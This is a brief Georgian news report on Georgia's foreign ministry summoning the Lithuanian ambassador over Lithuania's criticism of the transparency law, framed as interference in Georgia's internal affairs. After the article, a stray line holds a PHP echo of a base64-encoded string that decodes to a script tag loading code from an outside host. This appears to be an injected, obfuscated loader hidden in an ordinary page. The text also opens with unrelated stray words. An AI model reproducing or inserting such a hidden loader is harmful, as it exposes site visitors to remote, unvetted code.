celsiusi
ავერსი საქკაბელი

 საქართველოს საგრეო საქმეთა სამინისტრო უწყებაში ლიეტუვის ელჩის, ანდრიუს კალინდრას დაბარებასთან დაკავშიებით ოფიციალურ ინფორმაციას ავრცელებს.

როგორც განცხადებაშია აღნიშნული, ელჩს განემარტა, რომ ლიეტუვის ოფიციალური პირების განცხადებები, მინისტრის აქციაში მონაწილეობა, გამჭვირვალობის შესახებ კანონის მიღების გამო ლიეტუვის საგარეო უწყებაში საქართველოს ელჩის დაბარება ქვეყნის შიდა საქმეებში უხეშ ჩარევას წარმოადგენს.

„საქართველოს საგარეო საქმეთა სამინისტროში ლიეტუვის საგანგებო და სრულუფლებიანი ელჩი ანდრიუს კალინდრა დაიბარეს საქართველოში მიმდინარე პროცესებსა და გამჭვირვალობის შესახებ კანონთან დაკავშირებით ლიეტუვის მხარის პოზიციასა და ქმედებებთან დაკავშირებით. საქართველოს მხარემ ელჩს განუმარტა, რომ ლიეტუვის ოფიციალური პირების მიერ ბოლო პერიოდში გაკეთებული განცხადებები, ისევე როგორც საპროტესტო აქციაში ლიეტუვის საგარეო საქმეთა მინისტრის მონაწილეობა, ასევე გამჭვირვალობის შესახებ კანონის მიღების გამო ლიეტუვის საგარეო საქმეთა სამინისტროში საქართველოს ელჩის დაბარება წარმოადგენს ქვეყნის შიდა საქმეებში უხეშ ჩარევას და არ შეესაბამება ორ ქვეყანას შორის ტრადიციულად არსებულ მეგობრულ, პარტნიორულ ურთიერთობებს. შეხვედრაზე მხარეებმა გამოთქვეს ორ ქვეყანას შორის ურთიერთობების პოზიტიურ დღის წესრიგში დაბრუნების იმედი და გამოითქვა მზაობა, ორი ქვეყნის საგარეო საქმეთა სამინისტროებმა განაგრძონ თანამშრომლობის მიმდინარე დღის წესრიგზე მუშაობა“, – ნათქვამია განცხადებაში.

141
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");